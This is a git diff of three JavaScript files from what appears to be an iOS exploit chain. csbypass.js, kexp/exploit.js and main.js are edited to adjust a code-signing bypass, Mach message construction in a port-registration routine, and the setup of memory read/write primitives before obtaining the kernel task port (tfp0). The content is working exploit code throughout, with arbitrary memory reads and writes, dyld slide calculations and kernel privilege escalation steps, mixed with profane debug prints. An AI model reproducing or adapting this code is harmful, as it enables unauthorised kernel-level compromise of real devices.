dump

3 files changed, 10 insertions, 6 deletions

diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 8f7a56e..3065099 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) {
 	printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 	scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 	callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
-	callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test);
+	call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
 	printf("fuck1\n");
 	callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
 	printf("fuck2\n");
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 	write_u32(InP + 0x18, 1);
 	write_u32(InP + 0x1c, init_port_set);
 	write_u32(InP + 0x20, real_count);
-	write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+	write_u32(InP + 0x24, 0x0213c600);
 	write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
 	write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
 	write_u32(InP + 0x30, fake_count);
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 function mach_ports_lookup_shit() {
 	printf("fuck\n");
 	var arrz = shit_heap(4);
+	var arrz2 = shit_heap(4);
 	printf("fuck\n");
-	write_u32(arrz, 0);
+	write_u32(arrz, arrz2);
+	write_u32(arrz2, 0);
 	printf("fuck\n");
 	var sz = shit_heap(4);;
 	printf("fuck\n");
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
 //	var mts = mach_task_self();
 	printf("fuck\n");
 	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 	printf("mpl success\n");
 
 	return read_u32(read_u32(arrz) + 8);
@@ -461,7 +464,6 @@ again: while (true) {
 //	while (true) {
 		//
 //	}
-	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 	printf("fuck\n");
 //	var fake_port = read_u32(read_u32(arrz) + 8);
 
diff --git a/src/js/main.js b/src/js/main.js
index 5c45e85..75d730d 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,14 +77,16 @@ function main() {
 	large_buf[0] = 0x41424344;
 	printf("%x\n", read_u32(large_buf_ptr));
 
+	setup_fancy_rw();
+
 //	csbypass();
 
 //	return;
 
-	setup_fancy_rw();
 
 	printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
-	
+
+//return;
 	var tfp0 = get_kernel_task();
 	
 	printf("tfp0=%x\n", tfp0);